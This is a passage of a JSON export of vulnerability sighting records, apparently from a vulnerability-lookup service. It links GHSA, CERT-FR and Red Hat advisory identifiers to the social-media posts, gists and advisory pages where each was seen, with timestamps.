"", "creation_timestamp": "2025-12-07T15:01:49.000000Z"}, {"uuid": "42cc2caf-0597-459f-85ba-30f3908f52e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5j98-mcp5-4vw2", "type": "seen", "source": "https://gist.github.com/pxlvoid/2dee87e481533f31473871df69b485dc", "content": "", "creation_timestamp": "2025-12-07T15:01:49.000000Z"}, {"uuid": "9599f03c-f194-4a7e-959a-e5506fd6962c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-054", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m7i5gw5sie23", "content": "", "creation_timestamp": "2025-12-08T13:34:12.931885Z"}, {"uuid": "4d531480-a0c2-49ef-b023-b4a821244b3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-054", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115684203023191377", "content": "", "creation_timestamp": "2025-12-08T13:34:13.494521Z"}, {"uuid": "657cfec1-0059-4f99-9244-da37e8f08553", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-054", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m7ibf65t4i2x", "content": "", "creation_timestamp": "2025-12-08T14:44:49.541904Z"}, {"uuid": "92a05a3d-c0dc-40b1-93bb-7d960c81327f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wpqc-h9wp-chmq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115686590469006989", "content": "", "creation_timestamp": "2025-12-08T23:41:22.148366Z"}, {"uuid": "76106255-fc13-47f6-abf0-b8053d3a14e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g754-hx8w-x2g6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115702992177275477", "content": "", "creation_timestamp": "2025-12-11T21:12:32.263535Z"}, {"uuid": "01aa3553-2aa0-4d74-82a6-3ef7844036e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w476-j57g-96vp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115703053115304776", "content": "", "creation_timestamp": "2025-12-11T21:28:01.996932Z"}, {"uuid": "72e61939-a59b-488d-a11a-23ca9834d8ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5xx2-3q9w-jpgf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115703177084650374", "content": "", "creation_timestamp": "2025-12-11T21:59:33.643301Z"}, {"uuid": "ab45b737-0e5a-4747-82e2-f8306f743e9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20100526-mediator", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-10-147-01", "content": "", "creation_timestamp": "2010-05-27T10:00:00.000000Z"}, {"uuid": "ef249ee1-661c-4ebc-a43c-fd4864cf3ceb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-0122b398-ead7a30f46f5b85a", "content": "", "creation_timestamp": "2025-12-12T15:59:44.185926Z"}, {"uuid": "d5442f57-484f-4295-b1e3-38392f6a927b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9jvh-mv6x-w698", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/freepbx-security-advisory-av25-831", "content": "", "creation_timestamp": "2025-12-12T15:41:18.000000Z"}, {"uuid": "6ef10afc-2187-48c8-ac75-5492b851ea8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv6g-cmxc-vw8j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115741054476403924", "content": "", "creation_timestamp": "2025-12-18T14:32:17.080530Z"}, {"uuid": "7c91930e-5821-4525-9870-77cc29cd8917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29cp-2hmh-hcxj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115741054476403924", "content": "", "creation_timestamp": "2025-12-18T14:32:17.218280Z"}, {"uuid": "7f164e81-66a6-4b3e-ba12-23ad6f1bb839", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j22h-9j4x-23w5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115741064492295251", "content": "", "creation_timestamp": "2025-12-18T14:34:49.541639Z"}, {"uuid": "4eae9922-ce42-4d2a-91e0-d65090d06f28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9xwc-hfwc-8w59", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115741064492295251", "content": "", "creation_timestamp": "2025-12-18T14:34:49.646231Z"}, {"uuid": "69a9632e-8453-442f-a448-1eb463d389e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5cgr-j3jf-jw3v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115741064492295251", "content": "", "creation_timestamp": "2025-12-18T14:34:49.735383Z"}, {"uuid": "dc5a8b7d-4720-4722-b7d9-f0e291e002f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fff3-4rp7-px97", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115741399073059223", "content": "", "creation_timestamp": "2025-12-18T15:59:54.882020Z"}, {"uuid": "56b9c017-960d-4c62-ac21-139652c12de3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w7f5-8vf9-f966", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115742159119329167", "content": "", "creation_timestamp": "2025-12-18T19:13:12.476723Z"}, {"uuid": "10ecb46f-2197-4124-8727-568b84ca5efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r399-636x-v7f6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115771409372144460", "content": "", "creation_timestamp": "2025-12-23T23:11:55.749541Z"}, {"uuid": "b29e48ce-488b-428c-b0c6-b588649b1949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5hpf-p8fw-j349", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115771414260845090", "content": "", "creation_timestamp": "2025-12-23T23:13:10.339154Z"}, {"uuid": "5fdb33de-16bf-4211-9085-62167ec8870f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mapcr7e5rn2v", "content": "", "creation_timestamp": "2025-12-24T03:23:17.211024Z"}, {"uuid": "f1a46903-0325-41f6-8624-8d1657eb64dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4389-rwqf-q9gq", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-3e10999c-c8007be6f326122e", "content": "", "creation_timestamp": "2025-12-24T08:03:28.528637Z"}, {"uuid": "fe3de12b-242c-4efe-9793-2f39202845a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/115774146258953973", "content": "", "creation_timestamp": "2025-12-24T10:47:57.313275Z"}, {"uuid": "2f77d1c0-e73c-4a45-9b82-30bf847cce4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://bsky.app/profile/jeykey.org/post/3maryq64vlslc", "content": "", "creation_timestamp": "2025-12-25T05:01:44.417482Z"}, {"uuid": "efc2324c-396c-4b36-80fb-0b9ba772dd8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5pgg-2g8v-p4x9", "type": "seen", "source": "https://gist.github.com/unidel2035/18c236ff399063c4f2a414ea7a36b0e6", "content": "", "creation_timestamp": "2025-12-25T23:01:17.000000Z"}, {"uuid": "58e5616c-c630-47dd-af35-02821170a478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r6h-8v6p-xvw6", "type": "seen", "source": "https://gist.github.com/unidel2035/18c236ff399063c4f2a414ea7a36b0e6", "content": "", "creation_timestamp": "2025-12-25T23:01:17.000000Z"}, {"uuid": "db506d8c-c2ba-4409-8282-badbfe6b6e7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-057", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mb55ch5mtf2x", "content": "", "creation_timestamp": "2025-12-29T15:23:02.809089Z"}, {"uuid": "514c9c94-c14f-4504-99a9-5ac734542538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m273-6v24-x4m4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803564473058280", "content": "", "creation_timestamp": "2025-12-29T15:29:24.085472Z"}, {"uuid": "3ecaf5ed-73dc-4f3f-ab70-4c2ec5e7c06d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4675-36f9-wf6r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803564473058280", "content": "", "creation_timestamp": "2025-12-29T15:29:24.187966Z"}, {"uuid": "35bedd30-512d-46af-9aed-7c9e650a3097", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84r2-jw7c-4r5q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803564473058280", "content": "", "creation_timestamp": "2025-12-29T15:29:24.284412Z"}, {"uuid": "bd94674f-86e5-4ec7-82c1-ac6afa1c4615", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vqmv-47xg-9wpr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803564473058280", "content": "", "creation_timestamp": "2025-12-29T15:29:24.385367Z"}, {"uuid": "24ee79a1-00fb-45f5-b9f3-c0e1b1ca18e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r8g5-cgf2-4m4m", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803569905538682", "content": "", "creation_timestamp": "2025-12-29T15:30:46.498442Z"}, {"uuid": "6231a5de-9bf7-43d7-884c-c416ab758d9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-grc3-8w5x-g54q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803686314532339", "content": "", "creation_timestamp": "2025-12-29T16:00:22.772686Z"}, {"uuid": "2d2ef825-4c4a-467a-8f91-ee67319e896a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-377p-prwp-4hwf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803830491192724", "content": "", "creation_timestamp": "2025-12-29T16:37:02.691587Z"}, {"uuid": "d498f799-6f80-46e1-9aca-cf30309c54b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8wpr-639p-ccrj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115803836819515236", "content": "", "creation_timestamp": "2025-12-29T16:38:40.199699Z"}, {"uuid": "f453a676-c1ac-43e6-9772-9be0c0d4eb64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x843-g5mx-g377", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115804745566303123", "content": "", "creation_timestamp": "2025-12-29T20:29:46.604642Z"}, {"uuid": "f28433ca-505d-4137-8014-54db9f2a6c53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3329-ghmp-jmv5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115804745566303123", "content": "", "creation_timestamp": "2025-12-29T20:29:46.679955Z"}, {"uuid": "d92b042a-5bc5-4006-9f9e-6fa3209542e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38rv-8x93-pvrh", "type": "seen", "source": "https://github.blog/security/vulnerability-research/bugs-that-survive-the-heat-of-continuous-fuzzing/", "content": "", "creation_timestamp": "2025-12-29T21:01:14.000000Z"}, {"uuid": "b0706a8a-c7d2-43b7-9be4-22fb05d61b9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9xm-7538-mq8w", "type": "seen", "source": "https://github.blog/security/vulnerability-research/bugs-that-survive-the-heat-of-continuous-fuzzing/", "content": "", "creation_timestamp": "2025-12-29T21:01:14.000000Z"}, {"uuid": "a65a0b96-1292-43b1-b51e-72e57056342b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrw9-ggg3-3r4r", "type": "seen", "source": "https://github.blog/security/vulnerability-research/bugs-that-survive-the-heat-of-continuous-fuzzing/", "content": "", "creation_timestamp": "2025-12-29T21:01:14.000000Z"}, {"uuid": "0f97c0f6-f7b6-430f-a4e1-97d76896dd87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38h4-fx85-qcx7", "type": "seen", "source": "https://github.blog/security/vulnerability-research/bugs-that-survive-the-heat-of-continuous-fuzzing/", "content": "", "creation_timestamp": "2025-12-29T21:01:14.000000Z"}, {"uuid": "7d03f726-78f7-4ff7-acc6-b3e146a33444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496f-x7cq-cq39", "type": "seen", "source": "https://github.blog/security/vulnerability-research/bugs-that-survive-the-heat-of-continuous-fuzzing/", "content": "", "creation_timestamp": "2025-12-29T21:01:14.000000Z"}, {"uuid": "9de07589-5e86-49e7-b070-007f856e3b86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-057", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mb6zeaaww225", "content": "", "creation_timestamp": "2025-12-30T09:17:33.595234Z"}, {"uuid": "42670829-e46b-4e0c-b4b4-a79cbdde0fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-057", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115807764627722422", "content": "", "creation_timestamp": "2025-12-30T09:17:35.252648Z"}, {"uuid": "fe540564-4045-4ef0-acdd-41b260be9f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-www2-q4fc-65wf", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mb73xoybaz2d", "content": "", "creation_timestamp": "2025-12-30T10:04:14.853933Z"}, {"uuid": "a7b80094-6e38-4fe4-b10d-d04c6f0678c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-www2-q4fc-65wf", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mb7csrswqk27", "content": "", "creation_timestamp": "2025-12-30T12:07:00.549022Z"}, {"uuid": "71093ffb-d69b-4f93-a105-99c8d03884a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-www2-q4fc-65wf", "type": "seen", "source": "https://bsky.app/profile/nixpkgssecuritychanges.gerbet.me/post/3mb7css45cp2i", "content": "", "creation_timestamp": "2025-12-30T12:07:01.374198Z"}, {"uuid": "4a12d4ee-0bb9-4af5-b0d7-0e37a9ec6a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f8cm-6447-x5h2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115843866761403958", "content": "", "creation_timestamp": "2026-01-05T18:18:47.699673Z"}, {"uuid": "95641c7f-d79f-4aab-874f-c0fbaf80d878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6g8q-hp2j-gvwv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115844394905204282", "content": "", "creation_timestamp": "2026-01-05T20:33:06.641511Z"}, {"uuid": "8fca7919-7152-49dd-b31e-7c494db5e2b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-824x-88xg-cwrv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115844398425652355", "content": "", "creation_timestamp": "2026-01-05T20:34:00.293977Z"}, {"uuid": "bb34e2c8-879b-4770-8547-fb5e964abe8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrjc-q2fh-6x9h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115844615213362323", "content": "", "creation_timestamp": "2026-01-05T21:29:07.972417Z"}, {"uuid": "68607aef-2a85-4297-a7f2-66c01b85a869", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-phpv-94hg-fv9g", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115844736458981138", "content": "", "creation_timestamp": "2026-01-05T21:59:58.223537Z"}, {"uuid": "1272e195-b5c1-4fcf-89b6-ea45738be8a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mq8-rvhq-8wgg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115844791950366444", "content": "", "creation_timestamp": "2026-01-05T22:14:04.948309Z"}, {"uuid": "1eeacf53-0eca-4999-b9f9-505e30701af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mq8-rvhq-8wgg", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mbq2mfaygs2t", "content": "", "creation_timestamp": "2026-01-06T03:55:16.499501Z"}, {"uuid": "4a266fa7-64a2-48f8-837f-6c21b940bf64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-234r-xrrg-m8f3", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mbq2mferli2p", "content": "", "creation_timestamp": "2026-01-06T03:55:17.124779Z"}, {"uuid": "95e1ae3d-7a8d-496a-9a2f-8d126a2b5e37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4389-rwqf-q9gq", "type": "seen", "source": "https://bsky.app/profile/cyber-news-fi.bsky.social/post/3mbq2mffanl2v", "content": "", "creation_timestamp": "2026-01-06T03:55:17.637213Z"}, {"uuid": "274b3eea-8ca8-41cb-971d-a75904562cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v364-rw7m-3263", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115849435087390469", "content": "", "creation_timestamp": "2026-01-06T17:54:53.881922Z"}, {"uuid": "2a212284-0d20-4b46-8ab1-85717d6a7189", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gg4x-fgg2-h9w9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115849892053733021", "content": "", "creation_timestamp": "2026-01-06T19:51:06.349953Z"}, {"uuid": "fedede08-3faf-42ff-bc24-595dd5983290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3573-4c68-g8cc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115850329862818826", "content": "", "creation_timestamp": "2026-01-06T21:42:26.940350Z"}, {"uuid": "8c287cc6-66d1-41fa-ab6a-27d65dd811b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-36hm-qxxp-pg3m", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3mbuv2h3plo2x", "content": "", "creation_timestamp": "2026-01-08T01:59:08.341783Z"}, {"uuid": "59c6cd1e-9ffe-4c8e-8bde-3f12fe8444be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0251", "type": "seen", "source": "https://gist.github.com/Darkcrai86/db1dd30030a5415a647cf6a8245e2c88", "content": "", "creation_timestamp": "2026-01-08T07:55:33.000000Z"}, {"uuid": "9f39d6b3-7514-4c33-89d4-b500bddc0d0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0247", "type": "seen", "source": "https://gist.github.com/Darkcrai86/5ef0fc4009152b1d9283beb822762bb5", "content": "", "creation_timestamp": "2026-01-08T07:55:55.000000Z"}, {"uuid": "33a30302-3abd-47a7-8956-eba914b4f82c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0241", "type": "seen", "source": "https://gist.github.com/Darkcrai86/0baec000edca3ece0dea262e612d31b0", "content": "", "creation_timestamp": "2026-01-08T07:56:55.000000Z"}, {"uuid": "f3f7e445-3c16-43da-afa7-5b0a8775e19d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0237", "type": "seen", "source": "https://gist.github.com/Darkcrai86/da7e4d18ae3b88e2895c98c0d51ae1b2", "content": "", "creation_timestamp": "2026-01-08T07:57:35.000000Z"}, {"uuid": "a8eac9f9-295f-4bf6-ae62-41b43dde8958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0238", "type": "seen", "source": "https://gist.github.com/Darkcrai86/5358cd4798a8682d17d40e285f6d3639", "content": "", "creation_timestamp": "2026-01-08T07:57:15.000000Z"}, {"uuid": "93f75d27-f224-4563-81da-1fc028387688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0233", "type": "seen", "source": "https://gist.github.com/Darkcrai86/fbdf20b19e12fdac7917ef429b8a06b9", "content": "", "creation_timestamp": "2026-01-08T07:58:01.000000Z"}, {"uuid": "3463daed-a910-4883-9861-809150dbf1ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0210", "type": "seen", "source": "https://gist.github.com/Darkcrai86/a2089bf16ea2afb970cf4f8ede3f217f", "content": "", "creation_timestamp": "2026-01-08T07:58:48.000000Z"}, {"uuid": "8867f162-6d82-4e17-9c4a-dcc20094df65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0234", "type": "seen", "source": "https://gist.github.com/Darkcrai86/dd788ac5c935d04107e9a1f5a659a787", "content": "", "creation_timestamp": "2026-01-08T07:58:30.000000Z"}, {"uuid": "4e6379e4-1026-43d2-9186-952c79044c10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0211", "type": "seen", "source": "https://gist.github.com/Darkcrai86/740a2f1a37edf424774e4075c33bb5aa", "content": "", "creation_timestamp": "2026-01-08T07:59:24.000000Z"}, {"uuid": "bc6ca405-2eba-4e2e-80dc-86ffef6c77b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0225", "type": "seen", "source": "https://gist.github.com/Darkcrai86/599f72da8d906520e6ed3c9912224929", "content": "", "creation_timestamp": "2026-01-08T07:59:53.000000Z"}, {"uuid": "b72ede92-73a2-4c27-a28b-9f3e5b4905f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0216", "type": "seen", "source": "https://gist.github.com/Darkcrai86/0c4a312ff9864115a6d5a356f057c86b", "content": "", "creation_timestamp": "2026-01-08T08:00:44.000000Z"}, {"uuid": "a882f928-1aa9-460e-8cb3-c03dfccf059b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0212", "type": "seen", "source": 